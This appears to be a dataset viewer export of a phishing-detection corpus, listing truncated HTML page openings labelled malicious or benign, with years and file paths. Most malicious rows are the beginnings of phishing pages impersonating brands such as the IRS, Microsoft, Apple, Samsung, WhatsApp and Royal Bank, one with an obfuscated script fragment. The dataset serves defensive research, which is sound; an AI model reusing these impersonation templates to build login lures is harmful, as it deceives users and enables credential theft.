<title>Internal Revenue Service</title>
<link rel="stylesheet" media="all" href="template/style.css">
<body class="path-frontpage page-node-type-pup-home-page has-glyphicons">
<div class="dialog-off-canvas-main-canvas" ... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/728834c82a196e815169b99de7ee42e4147d69d91680aed3ed2133f47430ab36.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Alibaba Manufacturer Directory - Suppliers, Manufacturers,Exporters & Importers</TITLE>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 9.00.8112.16450">
<STYLE type=text/css>.... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/d4f50e3e-d1fa-11e8-9ddd-b01041fd2fc1.htm |
<!DOCTYPE html>
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-23287878-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/b696047ed7417d7f756c0f52581c52f06088db6ac8a6e2bd23fbaf9a466d26e8.htm |
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8" class="next-head next-head"/><title class="next-head">FundFire - Content Login Page</title><meta property="og:type" content="article" class="next-head"/><meta property="mm:media_code" content="ff" class="next-head"/><meta property="og:site_name" content="FundFi... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/4496b4a805407f626e45f90520d1eb2b71b3f1586b4c02cf85e7f6d50307ea2b.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="static/css/main.min.css">
<link rel="stylesheet" href="static/css/index.css... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/e7bd40aa08ecbe0275e8ac2aa5952ad1ce4f93a4e9e65e10a7d53aba58fb2e26.htm |
<!DOCTYPE html>
<html>
<head>
<title>Samsung</title>
<link rel="shortcut icon" type="image/png" href="https://www.google.com/s2/favicons?domain=samsung.com"/>
<!-- Scripts -->
<style>
body{
width:99%;
height:100%;
margin:0;
padding:0;
}... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/7aa7a666f514d2a1047830416d26c994fcd5efc0b8b6a542e5fd091c01e77b76.htm |
<html>
<head><title>
Go
</title></head>
<body>
<form name="go_form" method="post" action="./go2.aspx?t=1553861&tp=i-1NGB-Dw-9bZ-dEAXZ-1n-13gS-1c-dE38a-l4YG6P13HQ-1Klyxi+format(" id="go_form">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODExMDE5NzY5ZGT/SFnpnm9dB8Dkl7hOz... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/620e7dff4e130cf6a50814f94963161f1bf1c1df9af7c845a73b9d5f20254925.htm |
<!DOCTYPE html><html lang="ja"><head>
<script>window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","errorBeacon":"bam.nr-data.net","licenseKey":"0d1af2c661","applicationID":"15797243","transactionName":"cQsKRUNfWwlRF01FUEEXDV5fQxgLURI=","queueTime":4,"applicationTime":44,"agent":""}</script>
<script>(window.... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/f2432d7839824ae0f0eccdb6c2f7634324ccd30e5c785e5f0e82ed94f8a3e2f8.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head><meta content="locale=en" name="gwt:property"/><meta content="IE=EmulateIE10" http-equiv="X-UA-Compatible"/><title>Retarus Enterprise Administration Services</title><meta content="no-cache... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/2622a8303974902a9a8d2584a21f2138e873d4b830379eefd8e9d710a0294d12.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta content="width=300, initial-scale=1" name="viewport">
<meta name="robots" content="noindex">
<title>Verify it's you</title>
<style>
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 300;
src: local('Open San... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/20c8ad48-cacb-11e8-a395-b01041fd2fc1.htm |
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
</head>
<script language=javascript>
var StartTime = (new Date()).getTime();
var LayerFlag = (document.layers ? true:false);
var getStr = (LayerFlag ? this.src.substring(this.src.indexOf("URL")... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/d9c46b408aa9ee267c2c9453ef682b014b8aa34ef54a2a823a696e8554763bc2.htm |
<!DOCTYPE html> <html class="t3IRU"> <head> <meta property="og:type" content="classmates-com-p:invitation"/> <meta property="og:title" content="Invitation to join John Marshall High School Alumni"/> <meta property="og:image" content="https://a.cmcdn.com/places/static/images/CM-placesMonogram.png"/> <meta property... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/303a07321ad030a07e6a7183b9dc3f2ace2433a725723d48c2c55ae6599493d2.htm |
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, minimal-ui">
<title>Tesla is aiming to release Autopilot for intersections in just weeks in the US, will take months for other markets - Electrek</title>
... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/50d57c0435e73fcbed62488a90f3a500b00840691e4e6bd68e44df37064ec716.htm |
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><script type="text/javascript" src="/common/js/marriottCommon.js"> </script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
<meta http-equiv="Content-Style-Type" con... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/96314e282779d6363d7b223a634a890d5f1ba21ac79fde2e1591b7f8577501e6.htm |
<html>
<head>
<title>Sign in to your account</title>
<meta http-equiv="Content-Type"
content="text/html; charset=UTF-8">
<link rel="shortcut icon" href="files/favicon_a.ico">
<script type="text/javascript">//<![CDATA[
!function(){var r=window,n=r.$Debug=r.$Debug||{},e=r.$Config||{};if(!n.appendLog){va... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/8a6dbc2873090ca3ee858221cad8d067e527e61060ecdb02709a5d9f07241ee5.htm |
<html lang="en" class="version-d platform-desktop">
<head>
<meta charset="UTF-8">
<title>WhatsApp Group Invite</title>
<meta property="og:title" content="WhatsApp Group Invite"/>
<meta property="og:image" content="img/v4/icon.png"/>
<meta property="og:site_name" content="WhatsApp.com"/>
<meta name="viewport" content="w... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/c1b07954468f021024cce873e6072c94f715077b79e0fa11499448fffcdf113b.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head><meta content="locale=en" name="gwt:property"/><meta content="IE=EmulateIE10" http-equiv="X-UA-Compatible"/><title>Retarus Enterprise Administration Services</title><meta content="no-cache... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/ec9d0311d9cd6925e314f647ebb1eb63708036c64d8bb7e632e1a2ded75e3af6.htm |
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1" name="viewport"><title>Debtwire Login</title> <script src="https://www.google.com/recaptcha/api.js"></script><link href="//cdn.mmgcache.net/lib/normalize.css/3.0.1/normalize-3.0.1.min.css" rel="stylesheet"> <sc... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/6966c1f1e95efbb2a0b6efb502cb5ab95eb132732b30be84fd614a8d6ef807f4.htm |
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport"
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>...</title>
<link rel="shortcu... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/1b3ca5566d34ae711cfee30d03ba5458e4cda2e3cb564ec20611f141173860ab.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Br Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://br.enersys.com/favicon.ico">
<script type=... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/33d8979479f23b363df692fb71919acf25d7962c36de74eda8444d6cc1101a1b.htm |
<!doctype html>
<html lang="en">
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.1.1.min.js">
<script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/c0587b1b5d80367c3a1a64b516e274e32d5a7f34ab0fbe59641d3e4319221240.htm |
<!DOCTYPE html>
<!-- saved from url=(0176)https://www1.royalbank.com/cgi-bin/rbaccess/rbcgi3m01?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH&_ga=2.257941387.1496214564.1553101495-1353387452.1553101495 -->
<html lang="en" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation pos... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/3f1c270e9da2f71ad6f8f3e83fbcb2fd02c5f90920d0ed20f7dc07c4b5fa8c13.htm |
<!DOCTYPE html>
<!--[if IE 9 ]> <html lang="en-US" class="ie9 loading-site no-js"> <![endif]-->
<!--[if IE 8 ]> <html lang="en-US" class="ie8 loading-site no-js"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!--><html lang="en-US" class="loading-site no-js"> <!--<![endif]-->
<head>
<meta charset="UTF-8" />
<link rel="prof... | 0benign | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2020/2020/2974dec24f434eddcc525bedddc52acfb073f6e95043b198989cecc338f0b0a9.htm |
<html dir="ltr" lang="en"><head>
<title>Sign in to your account</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="shortcut icon" href="files/favicon_a.ico">
<script type="31cf587b845537ba547cd8a9-text/javascript">//<![CDATA[
!function(){var r=window,n=r.$Debug=r.$Debug||{},e=r.$Con... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/7bae44ab2c655e03751a9a3bc495f5f6a058522c1664cd9166334e4a5b4e8863.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sign In</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
href="images/favicon.ico"/>
<link href="css/conv.min.css" rel... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/b7bc50a26fe8a10868841032653c51d90253b978b87e1a1a2eb289d2fae1b274.htm |
<!DOCTYPE html>
<html>
<head>
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<link rel="shortcut icon" type="icon" href="images/favicon.png">
<link rel="stylesheet" type="text/css" href="... | 1malicious | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2019/2019/66a183d2d968760c1c359d7c9b446f24ee9816d7c35e4203dba97b5f110128be.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>电子发票和包裹跟踪</title>
<style type="text/css">
.auto-style1 {
fon... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/ac6c1a96727b050ae0324bc7750a9e231a90056b07252fecf3e6657b267a4c04.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Confirm Your Account</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon"
href="images/favicon.ico"/>
<script type="text/javascript">
funct... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/16dbec3e-d5e1-11e8-8787-b01041fd2fc1.htm |
<script type="text/javascript">
var random = 'ciwFdwmeVO39.32.60.2340d87dbb8ab69b82f5f9fa92b5a96bcf4dc588d8a0fe703a1bd5fb4bd4565a310PakistanAsiaPKAS04-06-202012-09-39pm';
var b = 'Y2l3RmR3bWVWTw==';
var result = '0d87dbb8ab69b82f5f9fa92b5a96bcf4dc588d8a0fe703a1bd5fb4bd4565a310';
var url = "";
var... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/27bb6d9ff6fa4c5abe0c057d372345fcd750f19f4ef45a6300e87c1d934d2463.htm |
<!doctype html>
<html dir="ltr" lang="EN-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<title>Sign in to your Microsoft account</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-sca... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/595acea15cc220270702995c5a04532b4a7bf0375b1224969de57d182b65a996.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="library/bootstrap/css/main.min.css">
<link rel="styleshe... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/69c606d43128f001c737c5f59d96931f5b6401a0038bd0f0533c3a6fe157d0d3.htm |
<!DOCTYPE html>
<html>
<head>
<title>Apple</title>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="assets/css/style.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesh... | 1malicious | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2018/2018/f1645212-d1ed-11e8-9ddd-b01041fd2fc1.htm |
<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp" name="robots"><m... | 0benign | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2018/2018/dfafc1fd-cc7d-11e8-ab7d-0a2a79604fa0.htm |
<!DOCTYPE html>
<!--[if lt IE 7]> <html lang="en" class="ie ie6 lte9 lte8 lte7 os-win"> <![endif]-->
<!--[if IE 7]> <html lang="en" class="ie ie7 lte9 lte8 lte7 os-win"> <![endif]-->
<!--[if IE 8]> <html lang="en" class="ie ie8 lte9 lte8 os-win"> <![endif]-->
<!--[if IE 9]> <html lang="en" class="ie ie9 lte9 os-w... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/ff8b2f8f6b7d2537f110426e1ade5376615d878cc01287d851f6f35111deea4f.htm |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<meta charset="windows-1251">
<title>�������� ������ � ������� mp3 � FLAC ������� ���������</title>
<meta name="description... | 0benign | 2,018 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2018/2018/9ef41245-d844-11e8-aae5-b01041fd2fc1.htm |
/* cyrillic-ext */
@font-face {
font-family: 'Pacifico';
font-style: normal;
font-weight: 400;
font-display: swap;
src: local('Pacifico Regular'), local('Pacifico-Regular'), url(https://fonts.gstatic.com/s/pacifico/v16/FwZY7-Qmy14u9lezJ-6K6MmTpA.woff2) format('woff2');
unicode-range: U+0460-052F, U+1C80-1C8... | 0benign | 2,019 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/benign/2019/2019/39c0b346e622b98606b47c801127ba39dcf37aa75277dfe75811533f8e24d45e.htm |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML
lang="en"><HEAD><META content="IE=11.0000" http-equiv="X-UA-Compat... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/494fcdff9ae68391e260f69e61fceb44706eea62dbf10208b53c3f801badd4c6.htm |
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Quick Pay</title>
<link href="/Content/common-payment.css" rel="stylesheet" />
<link href="/css/QuickPayCss?v=BAmsePpR2YG4X72gJ5HqoA-wDkDDASZWuaXBrkRDR1c1" rel="stylesheet"/>
... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/66a316f9a65e69f06b370c6770e7088194aad9d3ac1fe0deb4af85126af71c2a.htm |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
<title>Mycraftmail Client</title>
<link rel="icon" type="images/png" sizes="16*16" href="http://mycraftmail.com/favicon.ico">
<sc... | 1malicious | 2,020 | /home/cnlab-pu/dataset/phish_html/Phishing_dataset/malicious/2020/2020/b19d2d004d84ebb90e5bb66d89a1ce34356703452e6e682f1e71eecb103c7fc3.htm |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.